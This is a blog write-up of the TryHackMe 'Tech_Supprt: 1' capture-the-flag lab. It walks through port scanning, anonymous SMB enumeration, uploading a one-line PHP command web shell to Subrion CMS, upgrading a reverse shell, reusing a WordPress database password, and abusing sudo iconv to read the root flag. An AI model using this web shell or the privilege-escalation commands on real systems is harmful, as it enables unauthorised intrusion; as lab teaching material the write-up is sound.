Post

THM Tech_Supprt: 1 Writeup

Posted Updated
By Israel Hammon 6 min read

Intro

This box askes us to find a root flag, not much else in regards to direction or hints.

Let’s start with

Enumeration

1

rustscan -a 10.10.40.22

I like using rustscan initally as it is fast and works pretty well. We can run an nmap scan later to confirm services and look at all ports if we need to.

1
2
3
4
5

PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack
80/tcp  open  http         syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

Let’s use nmap to get more information

1

nmap -sV -sC -A -O -vv -p 22,80,139,445 10.10.40.22 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71

PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtST3F95eem6k4V02TcUi7/Qtn3WvJGNfqpbE+7EVuN2etoFpihgP5LFK2i/EDbeIAiEPALjtKy3gFMEJ5QDCkglBYt3gUbYv29TQBdx+LZQ8Kjry7W+KCKXhkKJEVnkT5cN6lYZIGAkIAVXacZ/YxWjj+ruSAx07fnNLMkqsMR9VA+8w0L2BsXhzYAwCdWrfRf8CE1UEdJy6WIxRsxIYOk25o9R44KXOWT2F8pP2tFbNcvUMlUY6jGHmXgrIEwDiBHuwd3uG5cVVmxJCCSY6Ygr9Aa12nXmUE5QJE9lisYIPUn9IjbRFb2d2hZE2jQHq3WCGdAls2Bwnn7Rgc7J09
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBClT+wif/EERxNcaeTiny8IrQ5Qn6uEM7QxRlouee7KWHrHXomCB/Bq4gJ95Lx5sRPQJhGOZMLZyQaKPTIaILNQ=
|   256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDolvqv0mvkrpBMhzpvuXHjJlRv/vpYhMabXxhkBxOwz
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:1F:B9:B4:2A:43 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.13 (99%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Android 5.0 - 5.1 (92%), Linux 3.10 (92%), Linux 3.12 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.60%E=4%D=3/30%OT=22%CT=%CU=43695%PV=Y%DS=1%DC=D%G=N%M=021FB9%TM=66088634%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)
SEQ(SP=108%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)
OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)
ECN(R=Y%DF=Y%T=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.006 days (since Sat Mar 30 21:28:39 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48060/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 58983/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 11738/udp): CLEAN (Timeout)
|   Check 4 (port 21073/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2024-03-31T03:07:52+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-03-30 21:37:52
|_  start_date: 1600-12-31 23:58:45

Looks like SMB might be able to give us some information. We can use SMBMap to enumerate if it is allowed without credentials.

1

smbmap.py -H 10.10.40.22

1
2
3
4
5

Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	websvr                                            	READ ONLY	
	IPC$                                              	NO ACCESS	IPC Service (TechSupport server (Samba, Ubuntu))

It looks like there is a share we are able to access, lets look into it.

1

smbmap.py -H 10.10.40.22 -s webserv -r 

1
2
3
4
5
6
7
8
9

Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	websvr                                            	READ ONLY	
	.\websvr\\*
	dr--r--r--                0 Sat May 29 08:17:38 2021	.
	dr--r--r--                0 Sat May 29 08:03:47 2021	..
	fr--r--r--              273 Sat May 29 08:17:38 2021	enter.txt
	IPC$                                              	NO ACCESS	IPC Service (TechSupport server (Samba, Ubuntu))

Let’s try and download that file

1

smbmap.py -H 10.10.40.22 -s webserv -r --download websvr/enter.txt

We find admin Subrion credentials which are “cooked with a magical formula”, not quite base64…

it also mentions that the /subrion site is not functioning, and we must edit it through the panel website-screenshot We can use our credentials here, at the same time we note the version, 4.2.1, let us search it is vulnerable to any exploits.

1
2
3
4
5
6
7
8
9
10
11

searchsploit 'Subrion 4.2.1'
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS        | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload     | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forger | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting      | php/webapps/45150.txt
Subrion CMS 4.2.1 - Stored Cross-Site Scripti | php/webapps/51110.txt
---------------------------------------------- ---------------------------------

Looks like there is an arbitrary file upload exploit available, looking through the exploit, it authenticates to the panel, uploads a php script which will allow us pass it commands as a parameter and then returns the url. Lets do this manually instead.

First step is to create a reverse shell

1
2

<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>

Let’s upload it to the site and get the path. website-screenshot website-screenshot

First user

We are now able to execute code on the machine, lets get a reverse shell instead. I used the PHP PentestMonkey shell and a netcat listener.

Now that we have a connection, lets upgrade our shell so we don’t run into any silly issues.

Ctrl+Z

1

python3 -c 'import pty; pty.spawn("/bin/bash")'

1
2

stty raw -echo; fg


1

export TERM=xterm

We know that there is a wordpress site on here, along with credentials most likely. Let’s see if the wp-config.php page is visible.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );

/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'REDACTED' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

Second user

We are able to see the username and password used for mysql, let’s see if they reused it for their machine password.

1
2
3

www-data@TechSupport:/var/www/html/wordpress$ su scamsite
Password: 
scamsite@TechSupport:/var/www/html/wordpress$

That works! One step closer. Let’s work on getting to that root account.

Privilege Escalation

Let’s list our sudo privileges for this user with:

1

sudo -l

1
2

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

We can run this command as root, let’s see if GTFObins has an exploit for it. website-screenshot Looks like they do!

We can craft this command to read the root flag

1

sudo iconv -f 8859_1 -t 8859_1 /root/root.txt

That is it for this box, thanks for following along!

Writeups, TryHackMe
tech support ctf
This post is licensed under CC BY 4.0 by the author.